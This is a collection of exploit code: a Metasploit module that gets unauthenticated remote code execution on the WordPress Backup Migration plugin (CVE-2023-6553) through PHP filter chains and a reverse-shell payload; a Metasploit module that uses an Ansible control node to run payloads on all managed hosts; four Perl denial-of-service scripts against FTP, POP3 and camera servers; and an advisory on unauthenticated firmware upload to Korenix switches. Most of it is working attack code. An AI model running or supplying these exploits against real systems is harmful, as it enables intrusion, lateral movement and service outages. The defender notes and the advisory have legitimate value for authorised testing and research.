<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2023-6553: unauthenticated RCE in the WordPress
# "Backup Migration" plugin (package directory "backup-backup", versions <= 1.3.7).
#
# Flow, as implemented below:
#   1. #check   - confirm WordPress is reachable and the plugin readme reports a
#                 version below the fixed one (1.3.8).
#   2. #exploit - #write_to_payload_file writes "<?php <payload>" to a file on the
#                 target one character per HTTP request (each request is a PHP
#                 filter chain carried in the Content-Dir header sent to
#                 backup-heart.php), copies that file to PAYLOAD_FILENAME, then
#                 #trigger_payload_file requests it over HTTP.
#
# Mixins used:
#   Remote::HttpClient            send_request_cgi, normalize_uri, target_uri
#   Remote::HTTP::Wordpress       wordpress_and_online?, wordpress_version,
#                                 check_plugin_version_from_readme
#   Remote::HTTP::PhpFilterChain  generate_php_filter_payload
#   FileDropper                   register_file_for_cleanup (registered files are
#                                 deleted when the session is cleaned up)
#   Remote::AutoCheck (prepended) runs #check before #exploit
#
# Defender's view, matching the 'Notes' metadata: IOC_IN_LOGS - a successful run
# is a burst of POSTs to /wp-content/plugins/backup-backup/includes/backup-heart.php,
# one per payload character, each carrying a multi-kilobyte Content-Dir header
# (see the size figures quoted in #write_to_payload_file); ARTIFACTS_ON_DISK - a
# one-letter file and PAYLOAD_FILENAME are created with bare file names, and
# #trigger_payload_file fetches the latter from the plugin's includes directory,
# so the files are presumably written there (inferred, not shown by this code).
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::Remote::HTTP::PhpFilterChain
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Backup Migration Plugin PHP Filter Chain RCE',
        'Description' => %q{
          This module exploits an unauth RCE in the WordPress plugin: Backup Migration (<= 1.3.7). The vulnerability is
          exploitable through the Content-Dir header which is sent to the /wp-content/plugins/backup-backup/includes/backup-heart.php endpoint.

          The exploit makes use of a neat technique called PHP Filter Chaining which allows an attacker to prepend
          bytes to a string by continuously chaining character encoding conversions. This allows an attacker to prepend
          a PHP payload to a string which gets evaluated by a require statement, which results in command execution.
        },
        'Author' => [
          'Nex Team', # Vulnerability discovery
          'Valentin Lobstein', # PoC
          'jheysel-r7' # msfmodule
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-6553'],
          ['URL', 'https://github.com/Chocapikk/CVE-2023-6553/blob/main/exploit.py'],
          ['URL', 'https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it'],
          ['WPVDB', '6a4d0af9-e1cd-4a69-a56c-3c009e207eca']
        ],
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
        },
        'Platform' => ['unix', 'linux', 'win', 'php'],
        'Arch' => [ARCH_PHP],
        'Targets' => [['Automatic', {}]],
        'DisclosureDate' => '2023-12-11',
        'DefaultTarget' => 0,
        'Privileged' => false,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        # Name of the .php file dropped on the target. The default (four random
        # letters + ".php") is generated once, when the module is instantiated.
        OptString.new('PAYLOAD_FILENAME', [ true, 'The filename for the payload to be used on the target host (%RAND%.php by default)', Rex::Text.rand_text_alpha(4) + '.php']),
      ]
    )
  end

  # Vulnerability check, also run automatically before #exploit via AutoCheck.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when the target is not an online
  #   WordPress install, Safe unless the plugin readme yields 'appears'
  #   (i.e. a version below the fixed 1.3.8), Appears otherwise
  def check
    return CheckCode::Unknown unless wordpress_and_online?

    wp_version = wordpress_version
    print_status("WordPress Version: #{wp_version}") if wp_version

    # The plugin's official name seems to be Backup Migration however the package filename is "backup-backup"
    # The second argument is the fixed version: versions below it are reported as 'appears'.
    check_code = check_plugin_version_from_readme('backup-backup', '1.3.8')

    if check_code.code != 'appears'
      return CheckCode::Safe
    end

    plugin_version = check_code.details[:version]
    print_good("Detected Backup Migration Plugin version: #{plugin_version}")
    CheckCode::Appears
  end

  # Send one PHP snippet to the vulnerable endpoint, encoded as a PHP filter
  # chain in the Content-Dir header.
  #
  # @param payload [String] PHP source to be evaluated by the target
  # @return [void]
  # @note aborts the module via fail_with when there is no response
  #   (Failure::Unreachable) or the status is not 200 (Failure::UnexpectedReply)
  def send_payload(payload)
    php_filter_chain_payload = generate_php_filter_payload(payload)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', 'backup-heart.php'),
      'method' => 'POST',
      'headers' => {
        'Content-Dir' => php_filter_chain_payload
      }
    )
    fail_with(Failure::Unreachable, 'Connection failed') if res.nil?
    fail_with(Failure::UnexpectedReply, 'The server did not respond with the expected 200 response code') unless res.code == 200
  end

  # Write +string_to_write+ to a file on the target, one character per request,
  # then copy it to PAYLOAD_FILENAME. Both files are registered for cleanup.
  #
  # @param string_to_write [String] full PHP file contents to drop
  # @return [void]
  def write_to_payload_file(string_to_write)
    # Because the payload is base64 encoded and then each character is translated into its corresponding php filter chain,
    # the payload becomes quite large and we start to hit limitations due to the HTTP header size.
    # For example this payload: "<?php fwrite(fopen("G", "a"),"\x73");?>", ends up being 7721 characters long.
    # The payload size limit on the target I was testing seemed to be around 8000 characters.
    # Using the following: <?php file_put_contents("file.php","char",FILE_APPEND);?> (more elegant solution) exceeds the
    # size limit which is why I ended up using <?php fwrite(fopen("<single_char_filename>", "char" ?> and then after
    # copying the single_char_filename to a filename with a .php extension to be executed.
    #
    # Consequence for detection: the number of POSTs to backup-heart.php equals the
    # length of the payload string, and every one of them carries a header of the
    # size described above.

    single_char_filename = Rex::Text.rand_text_alpha(1)
    string_to_write.each_char do |char|
      # Each character is appended as a "\xNN" escape so the dropped PHP is byte-exact.
      send_payload("<?php fwrite(fopen(\"#{single_char_filename}\",\"a\"),\"#{'\\x' + char.unpack('H2')[0]}\");?>")
    end
    register_file_for_cleanup(single_char_filename)
    send_payload("<?php copy(\"#{single_char_filename}\",\"#{datastore['PAYLOAD_FILENAME']}\");?>")
    register_file_for_cleanup(datastore['PAYLOAD_FILENAME'])
  end

  # GET the dropped file so the web server executes it. A reply is treated as a
  # sign of trouble: the payload is expected to hold the connection rather than
  # answer the request.
  #
  # @return [void]
  def trigger_payload_file
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-content', 'plugins', 'backup-backup', 'includes', datastore['PAYLOAD_FILENAME']),
      'method' => 'GET'
    )
    print_warning('The application responded to the request to trigger the payload, this is unexpected. Something may have gone wrong.') if res
  end

  # Entry point: drop the payload file and request it.
  #
  # @return [void]
  def exploit
    print_status('Writing the payload to disk, character by character, please wait...')
    # Use double quotes in the payload, not single.
    write_to_payload_file("<?php #{payload.encoded}")
    trigger_payload_file
  end
end
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local module that turns an existing session on an Ansible control node into
# sessions on the nodes it manages: it writes a playbook and a payload
# executable into WritableDir, runs ansible-playbook against HOSTS, and then
# waits ListenerTimeout seconds for the resulting sessions to call home.
#
# Mixins used:
#   Post::File               writable?, write_file, upload_and_chmodx
#   Exploit::EXE             generate_payload_exe
#   FileDropper              register_file_for_cleanup (control-node files only)
#   Local::Ansible           presumably ansible_playbook_exe and ping_hosts
#                            (both are called below but defined elsewhere)
#   Remote::AutoCheck        runs #check before #exploit
#
# Defender's view, matching the 'Notes' metadata: CONFIG_CHANGES /
# ARTIFACTS_ON_DISK - a new .yaml playbook and an executable appear in
# WritableDir on the control node, and the playbook copies, chmods, runs and
# deletes the executable in TargetWritableDir on every selected host. The
# playbook run itself is logged by Ansible (the author notes the task names are
# logged, which is why they are kept to plain numbers).
class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Local::Ansible

  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and options.
  #
  # @param info [Hash] module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ansible Agent Payload Deployer',
        'Description' => %q{
          This exploit module creates an ansible module for deployment to nodes in the network.
          It creates a new yaml playbook which copies our payload, chmods it, then runs it on all
          targets which have been selected (default all).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'n0tty' # original PoC, analysis
        ],
        'Platform' => [ 'linux' ],
        'Stance' => Msf::Exploit::Stance::Passive,
        'Arch' => [ ARCH_X86, ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [[ 'Auto', {} ]],
        'Privileged' => true,
        'References' => [
          [ 'URL', 'https://github.com/n0tty/Random-Hacking-Scripts/blob/master/pwnsible.sh'],
          [ 'URL', 'https://web.archive.org/web/20180220031610/http://n0tty.github.io/2017/06/11/Enterprise-Offense-IT-Operations-Part-1'],
        ],
        'DisclosureDate' => '2017-06-12', # pwnsible script but prob way before that
        'DefaultTarget' => 0,
        'Passive' => true, # this allows us to get multiple shells calling home
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [CONFIG_CHANGES, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options [
      # Directory on the control node (where the session lives) for the playbook and payload.
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
      # Ansible host pattern written into the playbook's "hosts:" field.
      OptString.new('HOSTS', [ true, 'Which ansible hosts to target', 'all' ]),
      # When true, ping the inventory first and pause 10 s so the operator can abort.
      OptBool.new('CALCULATE', [ true, 'Calculate how many boxes will be attempted', true ]),
      # Directory on each managed node where the payload is copied and run.
      OptString.new('TargetWritableDir', [ true, 'A directory where we can write files on targets', '/tmp' ]),
      # How long #exploit keeps the module alive for sessions to arrive; see the loop there.
      OptInt.new('ListenerTimeout', [ true, 'The maximum number of seconds to wait for new sessions', 60 ])
    ]
  end

  # Build the playbook text. Four tasks run on every selected host: copy the
  # payload from WritableDir to TargetWritableDir, set it root:root 0700,
  # execute it, then delete it (state: absent).
  #
  # NOTE(review): YAML indentation inside this string literal is significant.
  # The rendering here shows a single leading space on every line, which looks
  # like whitespace collapsed by the page; confirm the nesting against the
  # upstream source before relying on this text.
  #
  # @param payload_name [String] file name of the payload executable
  # @return [String] playbook YAML
  def module_contents(payload_name)
    # The `name` field in `tasks` is a required field, and it gets logged, so randomizing may be a little too obvious, I've opted for just numbers in this case.
    "- name: #{Rex::Text.rand_text_numeric(3..6)}
 hosts: #{datastore['HOSTS']}
 remote_user: root
 tasks:
 - name: 1
 ansible.builtin.copy:
 src: #{datastore['WritableDir']}/#{payload_name}
 dest: #{datastore['TargetWritableDir']}/#{payload_name}
 - name: 2
 ansible.builtin.file:
 path: #{datastore['TargetWritableDir']}/#{payload_name}
 owner: root
 group: root
 mode: '0700'
 - name: 3
 command: #{datastore['TargetWritableDir']}/#{payload_name}
 - name: 4
 file:
 path: #{datastore['TargetWritableDir']}/#{payload_name}
 state: absent
"
  end

  # Presence check: the module only needs an ansible-playbook executable.
  #
  # @return [Msf::Exploit::CheckCode] Safe when no executable is found, Appears otherwise
  def check
    return CheckCode::Safe('Ansible does not seem to be installed, unable to find ansible executable') if ansible_playbook_exe.nil?

    CheckCode::Appears('ansible playbook executable found')
  end

  # Ping the inventory, print a table of results, report how many hosts
  # answered 'pong', then pause 10 seconds so the operator can interrupt.
  # Returns early (after print_error) when ping_hosts yields nil.
  #
  # @return [void]
  def ping_hosts_print
    results = ping_hosts
    if results.nil?
      print_error('Unable to parse ping hosts results')
      return
    end

    columns = ['Host', 'Status', 'Ping', 'Changed']
    table = Rex::Text::Table.new('Header' => 'Ansible Pings', 'Indent' => 1, 'Columns' => columns)

    count = 0
    # Each result is expected to be a hash with 'host', 'status', 'ping' and
    # 'changed' keys (the shape ping_hosts returns is not visible here).
    results.each do |match|
      table << [match['host'], match['status'], match['ping'], match['changed']]
      count += 1 if match['ping'] == 'pong'
    end
    print_good(table.to_s) unless table.rows.empty?
    # give the user a few seconds to cancel if its too many etc
    print_good("#{count} ansible hosts were pingable, and will attempt to execute payload. If this isn't an expected volume (too many), ctr+c to halt execution. Pausing 10 seconds.")
    Rex.sleep(10)
  end

  # Entry point: optional inventory ping, write playbook + payload, run
  # ansible-playbook, store its output as loot, then idle while sessions arrive.
  #
  # @return [void]
  def exploit
    # Make sure we can write our exploit and payload to the local system
    fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']
    ping_hosts_print if datastore['CALCULATE']

    payload_name = rand_text_alphanumeric(5..10)
    module_name = rand_text_alphanumeric(5..10)

    print_status('Creating yaml job to execute')
    yaml_file = "#{datastore['WritableDir']}/#{module_name}.yaml"
    write_file(yaml_file, module_contents(payload_name))
    register_file_for_cleanup(yaml_file)
    print_status('Writing payload')
    upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", generate_payload_exe
    register_file_for_cleanup("#{datastore['WritableDir']}/#{payload_name}") # cleanup payload on host, not targets
    print_status('Executing ansible job')
    # The full ansible-playbook output is kept as loot; it is the record of
    # which hosts ran the payload (the managed nodes' copies are removed by task 4).
    resp = cmd_exec("#{ansible_playbook_exe} #{yaml_file}")
    playbook_log = store_loot('ansible.playbook.log', 'text/plain', session, resp, 'ansible.playbook.log', 'Ansible playbook log')
    print_good("Stored run logs to: #{playbook_log}")
    # stolen from exploit/multi/handler
    # Keep the module (and its handler) alive for ListenerTimeout seconds.
    # A timeout of 0 or less never satisfies the break condition, so the loop
    # then runs until the module is interrupted.
    stime = Time.now.to_f
    timeout = datastore['ListenerTimeout'].to_i
    loop do
      break if timeout > 0 && (stime + timeout < Time.now.to_f)

      Rex::ThreadSafe.sleep(1)
    end
  end

end
</code></pre>
<pre><code>#!/usr/bin/perl

use IO::Socket::INET;

# Exploit Title: SpyCamLizard 1.230 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 18 january 2024
# Vendor Homepage: http://www.spycamlizard.com
# Download to demo: https://drive.google.com/file/d/1daFgHh0VzbkDzIp41-imZbPoc6ETZDq2/view?usp=sharing
# Notification vendor: Yes reported
# Tested Version: SpyCamLizard 1.230 - Denial of Service (DoS)
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://youtu.be/Ksg8L-ZX2Us

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The SpyCamLizard does not correctly handle the amount of data or bytes sent.
#When authenticating to the SpyCamLizard with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

# What this script does, from the network's point of view: one TCP connection,
# one HTTP/1.0 GET whose request target is 9000 bytes long, no headers, then
# close. An oversized request line with no Host header on the camera's HTTP
# port is the observable signature; the script never checks whether the
# service actually stopped responding.

# Pick the clear-screen command from Perl's OS name ($^O).
# NOTE(review): Perl reports Windows as "MSWin32", so the "windows" branch is
# not expected to match there; the only effect is which clear command runs.
 $sis="$^O";

 if ($sis eq "windows"){
 $cmd="cls";
 } else {
 $cmd="clear";
 }

 system("$cmd");
 
 intro();   # banner
 main();    # reads $ip and $port from @ARGV, or prints usage and exits
 
 print "[+] Exploiting... \n";

print "[+] Connecting to $ip:$port\n";
# Request target: 3000 repetitions of a three-character string (9000 bytes).
my $exploit = "x41" x 3000;

# Plain TCP client; PeerAddr is taken from $host, PeerPort from $port.
my $httpsocket = IO::Socket::INET->new(
 PeerAddr => $host,
 PeerPort => $port,
 Proto => "tcp",
);
# Single bare HTTP/1.0 request, then close without reading a response.
$httpsocket->send("GET " . $exploit . " HTTP/1.0\r\n\r\n");
$httpsocket->close();

 # Printed unconditionally: nothing above verifies the outcome.
 print "[+] Done - Exploited success!!!!!\n\n";
 
 # Banner. The q{} literal below is printed verbatim (its whitespace is output).
 sub intro {
 print q {

 ,--,
 _ ___/ /\|
 ,;'( )__, ) ~
 // // '--; 
 ' \ | ^
 ^ ^

 [+] SpyCamLizard 1.230 - Denial of Service (DoS)

 [*] Coded by Fernando Mengali

 [@] e-mail: fernando.mengalli@gmail.com

 }
 }

 # Argument handling: sets the package variables $ip and $port from @ARGV and
 # exits with -1 when either is missing.
 sub main {

our ($ip, $port) = @ARGV;

 unless (defined($ip) && defined($port)) {

 print " \nUsage: $0 <ip> <port> \n";
 exit(-1);

 }
 }
</code></pre>
<pre><code>#!/usr/bin/perl


use Net::FTP;

# Exploit Title: Easy File Sharing FTP Server 3.6 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 17 january 2024
# Vendor Homepage: N/A
# Download to demo: 
# Notification vendor: No reported
# Tested Version: Easy File Sharing FTP Server 3.6
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# Vídeo: https://www.youtube.com/watch?v=U2svu2FiIVc

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the password entered by the user.
#When authenticating to the FTP server with a long password or a password with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

# What this script does, from the network's point of view: one FTP session,
# USER anonymous followed by a PASS argument of 2611 bytes, then QUIT. An
# anonymous login with a multi-kilobyte password is the observable signature;
# a failed login is what the script reports as "Possibly exploited".

# Pick the clear-screen command from Perl's OS name ($^O).
# NOTE(review): Perl reports Windows as "MSWin32", so the "windows" branch is
# not expected to match there; the only effect is which clear command runs.
 $sis="$^O";

 if ($sis eq "windows"){
 $cmd="cls";
 } else {
 $cmd="clear";
 }

 system("$cmd");
 
 intro();   # banner
 main();    # reads $ip and $port from @ARGV, or prints usage and exits
 
 print "[+] Exploiting... \n";

 # Password string: one 0x2c byte, 2000 "A"s, then 610 more 0x41 bytes (2611 bytes total).
 my $payload = "\x2c";
 $payload .= "A"x2000;
 $payload .= "\x41"x610;

 # Net::FTP connects to $ip on its default port; $port is not passed here.
 my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

 # Login failure (no reply or an error reply) is taken as the "success" signal.
 $ftp->login("anonymous",$payload) or die "[+] Possibly exploited!"; 

 $ftp->quit;

 # Printed only when the login above did not die.
 print "[+] Done - Exploited success!!!!!\n\n";
 
 # Banner.
 sub intro {
 print "######################################################################\n";
 print "# Easy File Sharing FTP Server 3.6 - Denied of Service #\n";
 print "# #\n";
 print "# Coded by Fernando Mengali #\n";
 print "# #\n";
 print "# e-mail: fernando.mengalli\@gmail.com #\n";
 print "# #\n";
 print "######################################################################\n";
 }

 # Argument handling: sets the package variables $ip and $port from @ARGV and
 # exits with -1 when either is missing.
 sub main {

our ($ip, $port) = @ARGV;

 unless (defined($ip) && defined($port)) {

 print " \nUsage: $0 <ip> <port> \n";
 exit(-1);

 }
 }

#3. Solution/ How to fix:

# This version product is deprecated
</code></pre>
<pre><code>#!/usr/bin/perl

use IO::Socket::INET

# Exploit Title: MailCarrier 2.51 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 16 january 2024
# Tested Version: MailCarrier 2.51
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.
#When authenticating to the POP3 server with a long USERNAME or a USERNAME with a large number of characters for the POP3 server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

# What this script does, from the network's point of view: one TCP connection
# to the POP3 port, read the banner, send "USER " followed by 6000 bytes, read
# one reply, send QUIT, close. A USER command several kilobytes long is the
# observable signature; the script never checks whether the service survived.

# Pick the clear-screen command from Perl's OS name ($^O).
# NOTE(review): Perl reports Windows as "MSWin32", so the "windows" branch is
# not expected to match there; the only effect is which clear command runs.
 $sis="$^O";

 if ($sis eq "windows"){
 $cmd="cls";
 } else {
 $cmd="clear";
 }

 system("$cmd");
 
 intro();   # banner
 main();    # reads $ip and $port from @ARGV, or prints usage and exits
 
 print "[+] Exploiting... \n";

 # USER argument: 6000 bytes of 0x41.
 my $buf = "\x41" x 6000;


 # Plain TCP client to $ip:$port; dies if the connection fails.
 my $s = IO::Socket::INET->new(
 PeerAddr => $ip,
 PeerPort => $port,
 Proto => 'tcp'
 ) or die "Unable to connect: $!\n";

 $s->recv(my $data, 1024); # Grab banners (if any)
 $s->send('USER ' . $buf . "\r\n");
 $s->recv(my $response, 1024);   # reply is read but never inspected
 $s->send("QUIT\r\n");
 $s->close();

 # Printed unconditionally: nothing above verifies the outcome.
 print "[+] Done - Exploited success!!!!!\n\n";
 
 # Banner. The q{} literal below is printed verbatim (its whitespace is output).
 sub intro {
 print q {

 ,--,
 _ ___/ /\|
 ,;'( )__, ) ~
 // // '--; 
 ' \ | ^
 ^ ^

 [+] MailCarrier 2.51 - Denial of Service (DoS)

 [*] Coded by Fernando Mengali

 [@] e-mail: fernando.mengalli@gmail.com

 }
 }

 # Argument handling: sets the package variables $ip and $port from @ARGV and
 # exits with -1 when either is missing.
 sub main {

our ($ip, $port) = @ARGV;

 unless (defined($ip) && defined($port)) {

 print " \nUsage: $0 <ip> <port> \n";
 exit(-1);

 }
 }

#3. Solution/ How to fix:

# This version product is deprecated
</code></pre>
<pre><code>#!/usr/bin/perl


use Net::FTP;

# Exploit Title: LightFTP 1.1 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 15 january 2024
# Vendor Homepage: N/A
# Notification vendor: No reported
# Tested Version: LightFTP 1.1
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)

#1. Description

#This technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the FTP server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

# What this script does, from the network's point of view: one FTP session,
# a USER argument of 500 bytes with password "anonymous", then QUIT. A USER
# command hundreds of bytes long is the observable signature; a failed login
# is what the script reports as "Possibly exploited".

# Pick the clear-screen command from Perl's OS name ($^O).
# NOTE(review): Perl reports Windows as "MSWin32", so the "windows" branch is
# not expected to match there; the only effect is which clear command runs.
 $sis="$^O";

 if ($sis eq "windows"){
 $cmd="cls";
 } else {
 $cmd="clear";
 }

 system("$cmd");
 
 intro();   # banner
 main();    # reads $ip and $port from @ARGV, or prints usage and exits
 
 print "[+] Exploiting... \n";

 # USER argument: 500 bytes of 0x41.
 my $payload = "\x41"x500; 

 # Net::FTP connects to $ip on its default port; $port is not passed here.
 my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

 # Login failure (no reply or an error reply) is taken as the "success" signal.
 $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!"; 

 $ftp->quit;

 # Printed only when the login above did not die.
 print "[+] Done - Exploited success!!!!!\n\n";
 
 # Banner. The q{} literal below is printed verbatim (its whitespace is output).
 sub intro {
 print q {

 ,--,
 _ ___/ /\|
 ,;'( )__, ) ~
 // // '--; 
 ' \ | ^
 ^ ^

 [+] LightFTP 1.1 - Denial of Service (DoS)

 [*] Coded by Fernando Mengali

 [@] e-mail: fernando.mengalli@gmail.com

 }
 }

 # Argument handling: sets the package variables $ip and $port from @ARGV and
 # exits with -1 when either is missing.
 sub main {

our ($ip, $port) = @ARGV;

 unless (defined($ip) && defined($port)) {

 print " \nUsage: $0 <ip> <port> \n";
 exit(-1);

 }
 }

#3. Solution/ How to fix:

# This version product is deprecated
</code></pre>
<pre><code>CyberDanube Security Research 20240109-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| Korenix JetNet Series<br /> vulnerable version| See "Vulnerable versions"<br /> fixed version| -<br /> CVE number| CVE-2023-5376, CVE-2023-5347<br /> impact| High<br /> homepage| https://www.korenix.com/<br /> found| 2023-08-31<br /> by| S. Dietz (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Korenix Technology, a Beijer group company within the Industrial Communication<br />business area, is a global leading manufacturer providing innovative, market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />With decades of experiences in the industry, we have developed various product<br />lines [...].<br /><br />Our products are mainly applied in SMART industries: Surveillance, Machine-to-<br />Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer<br />base covers different Sales channels, including end-customers, OEMs, system<br />integrators, and brand label partners. 
[...]"<br /><br />Source: https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Vulnerable versions<br />-------------------------------------------------------------------------------<br />Tested on emulated Korenix JetNet 5310G / v2.6<br /><br />All vulnerable models/versions according to vendor:<br />JetNet 4508 (4508i-w V1.3, 4508 V2.3, 4508-w V2.3)<br />JetNet 4508f, 4508if (4508if-s V1.3,4508if-m V1.3, 4508if-sw V1.3,<br /> 4508if-mw V1.3, 4508f-m V2.3, 4508f-s V2.3, 4508f-mw V2.3,<br /> 4508f-sw V2.3)<br />JetNet 5620G-4C V1.1<br />JetNet 5612GP-4F V1.2<br />JetNet 5612G-4F V1.2<br />JetNet 5728G (5728G-24P-AC-2DC-US V2.1, 5728G-24P-AC-2DC-EU V2.0)<br />JetNet 528Gf (6528Gf-2AC-EU V1.0, 6528Gf-2AC-US V1.0, 6528Gf-2DC24 V1.0,<br /> 6528Gf-2DC48 V1.0, 6528Gf-AC-EU V1.0, 6528Gf-AC-US V1.0)<br />JetNet 6628XP-4F-US V1.1<br />JetNet 6628X-4F-EU V1.0<br />JetNet 6728G (6728G-24P-AC-2DC-US V1.1, 6728G-24P-AC-2DC-EU V1.1)<br />JetNet 6828Gf (6828Gf-2DC48 V1.0, 6828Gf-2DC24 V1.0, 6828Gf-AC-DC24-US V1.0,<br /> 6828Gf-2AC-US V1.0, 6828Gf-AC-US V1.0, 6828Gf-2AC-AU V1.0,<br /> 6828Gf-AC-DC24-EU V1.0, 6828Gf-2AC-EU V1.0)<br />JetNet 6910G-M12 HVDC V1.0<br />JetNet 7310G-V2 2.0<br />JetNet 7628XP-4F-US V1.0, 7628XP-4F-US V1.1, 7628XP-4F-EU V1.0,<br /> 7628XP-4F-EU V1.1<br />JetNet 7628X-4F-US V1.0, 7628X-4F-EU V1.0<br />JetNet 7714G-M12 HVDC V1.0<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) TFTP Without Authentication (CVE-2023-5376)<br />The available tftp service is accessable without user authentication. This<br />allows the user to upload and download files to the restricted "/home" folder.<br /><br />2) Unauthenticated Firmware Upgrade (CVE-2023-5347)<br />A critical security vulnerability has been identified that may allow an<br />unauthenticated attacker to compromise the integrity of a device or cause a<br />denial of service (DoS) condition. 
This vulnerability resides in the firmware<br />upgrade process of the affected system.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) TFTP Without Authentication (CVE-2023-5376)<br />The Linux tftp client was used to upload a firmware to the absolute path<br />"/home/firmware.bin":<br /><br /># tftp $IP<br />tftp> put exploit.bin /home/firmware.bin<br />Sent 5520766 bytes in 5.7 seconds<br /><br /><br />2) Unauthenticated Firmware Upgrade (CVE-2023-5347)<br />Unauthenticated attackers can exploit this by uploading malicious firmware via<br />TFTP and initializing the upgrade process with a crafted UDP packet on port<br />5010.<br /><br />We came to the conclusion that the firmware image consists of multiple<br />sections. Our interpretation of these can be seen below:<br /><br />===============================================================================<br />class FirmwarePart:<br /> def init(self, name, offset, size):<br /> self.name = name<br /> self.offset = offset<br /> self.size = size<br /><br />firmware_parts = [<br /> FirmwarePart("uimage_header", 0x0, 0x40),<br /> FirmwarePart("uimage_kernel", 0x40, 0x3c54),<br /> FirmwarePart("gzip", 0x3c94, 0x14a000 - 0x3c94),<br /> FirmwarePart("squashfs", 0x14a000, 0x539000 - 0x14a000),<br /> FirmwarePart("metadata", 0x539000, 5480448 - 0x539000),<br />]<br />===============================================================================<br /><br />The squashfs includes the rootfs. Metadata includes a 4 byte checksum which<br />needs to be modified when repacked. During our analysis we observed that the<br />checksum gets calculated over all sections except metadata. 
